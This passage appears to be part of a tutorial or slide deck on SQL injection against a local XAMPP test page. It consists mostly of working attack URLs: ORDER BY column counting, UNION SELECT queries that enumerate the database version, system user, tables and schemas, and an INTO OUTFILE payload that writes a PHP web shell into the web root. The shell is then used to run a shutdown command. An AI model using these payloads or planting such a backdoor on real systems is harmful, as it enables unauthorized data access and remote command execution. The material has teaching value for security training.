3. Attacking vulnerability Finding the number of columns http://192.168.0.101/xampp/one.php?id=1 order by 2,3…(give each number one by one) If you get an error message for order by 3 that means there are 2 columns been used in select query.
4. Enumerating data Below query should show actual data as well as 1, 2 http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges— Trying removing the actual data to see data like id=-1 will not have any data to be returned so it will only show join query data http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges—
5. Enumerating data 1. database version http://192.168.0.101/xampp/one.php?id=1 union select @@version ,2 from information_schema.schema_privileges-- 2. system_user() http://192.168.0.101/xampp/one.php?id=1 union select system_user() ,2 from information_schema.schema_privileges-- 3. table_names http://192.168.0.101/xampp/one.php?id=1 union select table_name ,2 from information_schema.columns-- 4. databases names http://192.168.0.101/xampp/one.php?id=1 union select table_schema ,2 from information_schema.columns--
6. Creating backdoor 1. for creating a webshell “c.php” file http://192.168.0.101/xampp/one.php?id=-1 UNION SELECT "<? system($_REQUEST['cmd']); ?>", 2 INTO OUTFILE "e:/xampp/htdocs/xampp/c.php" -- 2. Exploiting using webshell http://192.168.0.101/xampp/c.php?cmd=shutdown.exe /s